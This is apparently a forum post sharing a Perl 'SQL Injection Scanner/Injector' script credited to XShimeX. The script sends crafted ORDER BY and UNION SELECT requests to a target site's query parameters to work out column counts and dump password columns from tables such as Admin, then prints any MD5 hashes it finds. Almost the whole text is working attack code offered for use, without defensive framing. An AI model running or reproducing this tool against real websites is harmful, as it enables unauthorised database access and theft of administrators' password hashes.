13 Years of Service
24%
Code:
>
#SQL Injection Scanner/Injector By XShimeX
#Contact: slientro[AT]yahoo.com.my
use strict;
use warnings;
use LWP::UserAgent;
use IO::Socket::INET;
use HTTP::Request::Common;
use Getopt::Long qw(:config no_ignore_case);
print "
[*]SQL Injection Scanner/Injector By XShimeX\n";
print "
[*]Script only Support MD5 Password\n";
my $ua = LWP::UserAgent->new( cookie_jar => {}, agent => "Mozilla FireFox" );
my %parms = (
s => "",
f => "",
d => "",
o => "",
u => "",
i => "",
e => "",
c => "",
eu => "",
sv => "",
t => "" );
GetOptions \%parms, "s=s", "u=s", "f=s", "o=s", "u=s", "i=s","p=s","e=s", "d=s", "t=s", "c=s", "eu=s", "sv";
if( !$parms{s} ) {
die [*]Usage: $0
[-s] Site -> http://url.com
[-f] Path/Files -> pages/news.php
[-d] Do -> 0 : Order 1 : Union
[-i] GET -> news_id=-2
[-o] Order -> 2
[-u] Union Select -> 1,2,3
[-c] Column -> password
[-eu] End union -> 4,5,6
[-e] End of syntax -> /* or --
[-t] Table -> Admin
[-sv] Save the HTML Source to file (use to view error or info) -> -sv
HELP
}
if (!$parms{d} == 1){
scan();
}else {
scan2();
}
sub scan{
if (!$parms{s}){
print "
[*]Die ! Can't Use if you not enter URL ;(\n";
}
if (!$parms{f}){
print "
[*]Die ! Can't Use if you not enter File path ;(\n";
}else{
print "
[*]Website -> ".$parms{s}."\n";
print "
[*]File -> ".$parms{f}."\n";
my $file = "/".$parms{f}."?";
my $order = "order by ".$parms{o}."";
my $ordernew = $parms{o};
my $item = $parms{i};
my $end = $parms{e};
my $target = $parms{s}."$file"."$item "."$order"." $end";
my $request = $ua->request(HTTP::Request->new(GET=>$target));
my $answer = $request->content;
if ($parms{sv}){
open (LOG, '>>log.html');
print LOG "$answer\r\n";
print "
[*]File save ;).";
close(LOG);
}
print "\n";
print $target;
print "\n";
if ($answer =~/(You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near)/){
print "
[*]Got This error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near\n";
print "
[*]Maybe you forgot to enter -e -- or -e /*\n";
}
if ($answer =~/(Unknown column '$ordernew')/){
print "
[*]Order ID Was Wrong, Try other one ;)\n";
}else{
print "
[*]I think no error out or you can use '-sv' to read the error\n";
}
}
};
sub scan2{
if (!$parms{s}){
print "
[*]Die ! Can't Use if you not enter URL ;(\n";
}
if (!$parms{f}){
print "
[*]Die ! Can't Use if you not enter File path ;(\n";
}else{
print "
[*]Website -> ".$parms{s}."\n";
print "
[*]File -> ".$parms{f}."\n";
my $file = "/".$parms{f}."?";
my $item = $parms{i};
my $table = "from ".$parms{t}." ";
my $end = $parms{e};
my $column = $parms{c};
my $endunion = $parms{eu};
my $union = "union all select ".$parms{u}.",".$column.",".$endunion." ";
my $target = $parms{s}."$file"."$item "."$union"."$table"." $end";
my $request = $ua->request(HTTP::Request->new(GET=>$target));
my $answer = $request->content;
if ($parms{sv}){
open (LOG, '>>log.html');
print LOG "$answer";
print "
[*]File save ;).";
close(LOG);
}
print "\n";
print $target;
print "\n";
if ($answer =~/(Unknown column '$column')/){
print "
[*]Unknown Column Name '".$column."'";
}
if ($answer =~/(The used SELECT statements have a different number of columns)/){
print "
[*]You got this error : The used SELECT statements have a different number of columns '".$column."'";
}
if ($answer =~/([0-9a-fA-F]{32})/){
print "
[*]Password MD5: $1";
}else{
print "\n";
print "
[*]Attack Failed or you can use '-sv' to read the error \n";
}
}
};